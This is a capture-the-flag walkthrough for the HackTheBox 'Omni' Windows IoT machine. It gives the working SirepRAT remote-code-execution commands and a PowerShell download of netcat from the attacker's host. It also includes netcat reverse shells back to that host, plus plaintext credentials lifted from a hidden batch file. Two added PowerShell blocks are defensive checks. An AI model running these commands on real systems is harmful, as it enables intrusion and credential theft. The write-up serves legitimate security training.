Omni HackTheBox WalkThrough
This is the Omni HackTheBox walkthrough. In this writeup I have demonstrated, step by step, how I rooted the Omni HTB machine. Before starting, let us know something about this machine. Its OS is not known, hence it is categorized as "other". It has been given the security level easy by its maker and has been assigned the IP address 10.10.10.204.
First of all, connect your local machine to the VPN so that you have access to the lab machines, and confirm connectivity by pinging the IP address 10.10.10.204. If all is correct, start hacking.
As usual, I began by scanning the IP address so that I could get some starting point.
Nmap [a port scanner] gave the following result.
$nmap -sV -sC -O -oN omni_scan 10.10.10.204
Nmap revealed that ports 135 and 8080 are open. Msrpc is running on port 135 and an IIS web server is running on 8080. On going to the URL http://10.10.10.204:8080/ I found a login page, similar to the one on a Tomcat web server, and a message which says Windows Device Portal.
Windows Device Portal is a web server through which you can manage and configure your IoT devices remotely using a web browser. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device.
As I had got some information about the software being used, I immediately googled "Windows Device Portal exploit" to look for available public exploits for this software, and got this article on the first page of the search results. After reading the article I came to know that the Windows IoT operating system is affected by an RCE vulnerability in which an attacker can exploit the Sirep/WPCon communications protocol to execute commands on the OS without dropping a payload onto the OS. For more information about the exploit and its usage you can refer to this GitHub repository.
We have the exploit; let us use it to confirm whether we have Remote Code Execution or not.
$git clone https://github.com/SafeBreach-Labs/SirepRAT.git
$python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell.exe ipconfig" --v
We can clearly see that we can execute OS commands remotely. Therefore, to get a reverse shell I dropped a netcat binary inside a publicly writable folder of the Windows OS and then executed a command to connect back to our machine. You can get a list of publicly writable folders from this repository.
$python3 -m http.server 80 //Start python web server locally by hosting nc64.exe file
$rlwrap nc -nvlp 4321
$python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\net1.exe -Uri http://10.10.14.86/nc64.exe" --v
$python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\net1.exe 10.10.14.86 4321 -e powershell.exe" --v
Note: If you use the C:\Windows\System32\spool\drivers\color\ directory to download your binary, you may get an error that 'nc64.exe is being used by some other program'. To avoid this error you can use the C:\Windows\System32\spool\ directory and rename the binary from nc64.exe to net1.exe when downloading it remotely. Alternatively, follow the commands exactly as I have used them.
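The binary drop above relies on directories under System32 that ordinary users can write to. As an added defender-side check (not part of the walkthrough, and assuming a Windows host and an elevated PowerShell session), this script lists executables in those directories that do not carry a valid Microsoft signature and reports whether the directory itself is user-writable:

```powershell
# Added example, not from the walkthrough: audit the user-writable System32
# directories the walkthrough abuses (spool, spool\drivers\color) for
# executables that Microsoft did not sign, such as a renamed netcat.
# Assumes Windows and an elevated session so every ACL and file is readable.
function Find-UnsignedDrops {
    param(
        [string[]]$Paths = @(
            "$env:SystemRoot\System32\spool",
            "$env:SystemRoot\System32\spool\drivers\color",
            "$env:SystemRoot\Tasks"
        )
    )
    foreach ($dir in $Paths) {
        if (-not (Test-Path -Path $dir)) { continue }
        # Does the directory grant write/create rights to broad groups?
        $acl = Get-Acl -Path $dir
        $userWritable = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference -match 'Users|Everyone|Authenticated Users' -and
            $_.FileSystemRights.ToString() -match 'Write|CreateFiles|Modify|FullControl'
        }
        Get-ChildItem -Path $dir -File -Recurse -Include *.exe,*.dll -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            # Valid signature from a Microsoft certificate is the expected state here
            $microsoft = $sig.Status -eq 'Valid' -and
                         $sig.SignerCertificate.Subject -match 'Microsoft'
            if (-not $microsoft) {
                [pscustomobject]@{
                    Path        = $_.FullName
                    Status      = $sig.Status
                    Signer      = $sig.SignerCertificate.Subject
                    Created     = $_.CreationTime
                    DirWritable = [bool]$userWritable
                }
            }
        }
    }
}

# Anything listed here with DirWritable = True deserves a closer look.
Find-UnsignedDrops | Format-Table -AutoSize
```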
We got a shell. I confirmed it by running
$env:UserName
(Used $env:UserName because the whoami command is not present.)
I tried to access the C:\Users\ directory to list the users on the box, but no user is present inside the Users folder. I used the command
$net user
to list all the users we have. We have two users, app and administrator. However, they are not present in their default directory. Maybe they are on some other drive? Let us check. I used the
$Get-PSDrive
PowerShell command to list all the drives on the Omni machine.
For more info about the Omni machine you can run the PowerShell cmdlet
Get-PSDrive tells us that the Omni machine has three drives, including U. I changed the drive to U and found the users app and administrator inside the directory U:\Users\. We can capture the user flag now.
It appears that the user flag is encrypted using a PowerShell function to prevent unauthorized access. I did not know how to decrypt it, so I just googled "PowerShell Password Decryption" and got this appropriate link on the first page. According to this website, user.txt can be decrypted using the following method.
$UserCreds = Import-CliXml -Path U:\Users\app\user.txt
When I tried to decrypt it I got an error. This error is probably due to unauthorized access to the user.txt file, because user.txt is owned by user app and currently we are logged in as omni. (A file written by Export-CliXml stores the SecureString as a DPAPI blob protected under the exporting user's key, so only that account can read it back.) So anyhow, we have to log in using the app user's credentials. But currently we don't have any credentials for user app. After some enumeration I got the directory C:\Program Files\WindowsPowerShell\Modules\PAckageManagement\, which contains a hidden file named r.bat. The content of the file r.bat can be accessed using
$type C:\'Program Files'\WindowsPowerShell\Modules\PAckageManagement\r.bat
From the above file I got some credentials.
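The decryption failure above comes from how Export-CliXml stores a credential. This added example (not from the walkthrough; assumes Windows, and uses a constructed credential rather than the box's flag) round-trips a PSCredential through Export-CliXml and Import-CliXml, shows that the file holds a DPAPI blob instead of the plaintext, and wraps the import in a function that reports whether the current account can unprotect it:

```powershell
# Added example, not from the walkthrough. Export-CliXml protects a SecureString
# with DPAPI under the exporting user's master key; Import-CliXml as a different
# account (omni in the walkthrough) fails with a CryptographicException.
$plain  = 'constructed-sample-secret'   # constructed value, not the box's flag
$secure = ConvertTo-SecureString $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('app', $secure)
$path   = Join-Path $env:TEMP 'cred-demo.xml'
$cred | Export-Clixml -Path $path

# On disk the password is an <SS> element holding hex-encoded DPAPI ciphertext.
[xml]$doc = Get-Content -Path $path -Raw
$blob = $doc.Objs.Obj.Props.SS.'#text'
if ($blob -match '^[0-9a-f]+$' -and $blob -notmatch [regex]::Escape($plain)) {
    "Stored form is a DPAPI blob of $($blob.Length) hex chars; plaintext absent"
}

function Test-CliXmlCredential {
    # Returns 'decrypted', 'dpapi-denied' or 'error' for a CliXml credential file
    # without displaying the secret.
    param([Parameter(Mandatory)][string]$File)
    try {
        $c = Import-Clixml -Path $File -ErrorAction Stop
        # Unwrapping succeeds only under the exporting user's DPAPI key.
        $null = $c.GetNetworkCredential().Password
        return 'decrypted'
    } catch {
        $e = $_.Exception
        while ($e) {
            # "Key not valid for use in specified state": other user or machine
            if ($e -is [System.Security.Cryptography.CryptographicException]) {
                return 'dpapi-denied'
            }
            $e = $e.InnerException
        }
        return 'error'
    }
}

# Same account that exported the file: the round trip matches.
$state = Test-CliXmlCredential -File $path
$ok = (Import-Clixml -Path $path).GetNetworkCredential().Password -eq $plain
"Import as exporting user: $state; round-trip matches: $ok"
Remove-Item -Path $path
```

Running Test-CliXmlCredential against the same file from another account on the same machine returns 'dpapi-denied', which is the condition the walkthrough hit as omni.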
Since we have a login panel at http://10.10.10.204:8080, let us use the credential mesh5143 to log in as user app.
Login into Portal
We are successfully logged in. Windows Device Portal (WDP) gives us the facility to manage all the processes using a command prompt. We can run our command using the run command panel.
Since we have already dropped our netcat binary [renamed to net1.exe] inside the directory C:\Windows\System32\Spool\, we will use this binary to get a reverse connection to our netcat listener locally. As we are now logged in as user app, our reverse shell will run with the privileges of user app and we can easily decrypt the content of the user.txt file. So I ran the commands below to get a shell.
$rlwrap nc -nvlp 2345 //Run it locally to get reverse connection
$C:\Windows\System32\spool\net1.exe 10.10.14.86 2345 -e powershell.exe //on the command prompt window of WDP. You may get an error as below, but you will find your command has been executed.
Capture User Flag
$$UserCreds = Import-CliXml -Path U:\Users\app\user.txt
We also have the administrator account credential from the r.bat file. We just need to log out from the app account and then log in as user administrator and follow the same steps as we did with user app. To log out from the user app, just close the browser window and clear your browsing history to remove the logged-in cookie. Then log in using the credential _1nt3rn37ofTh1nGz and execute the same command as you did with user app, changing the listening port of netcat.
$rlwrap nc -nvlp 3456
$C:\Windows\System32\spool\net1.exe 10.10.14.86 3456 -e powershell.exe
We got an administrative-privilege shell, so we have successfully escalated privileges to the admin user.
Capture Root Flag
#$UserCreds = Import-CliXml -Path U:\Users\administrator\root.txt
This was how I rooted Omni HackTheBox. I learnt a lot after hunting this box. I hope you have also learnt some new things from this box. Thanks for reading this writeup. For any query or suggestion related to the walkthrough, feel free to contact us at [email protected].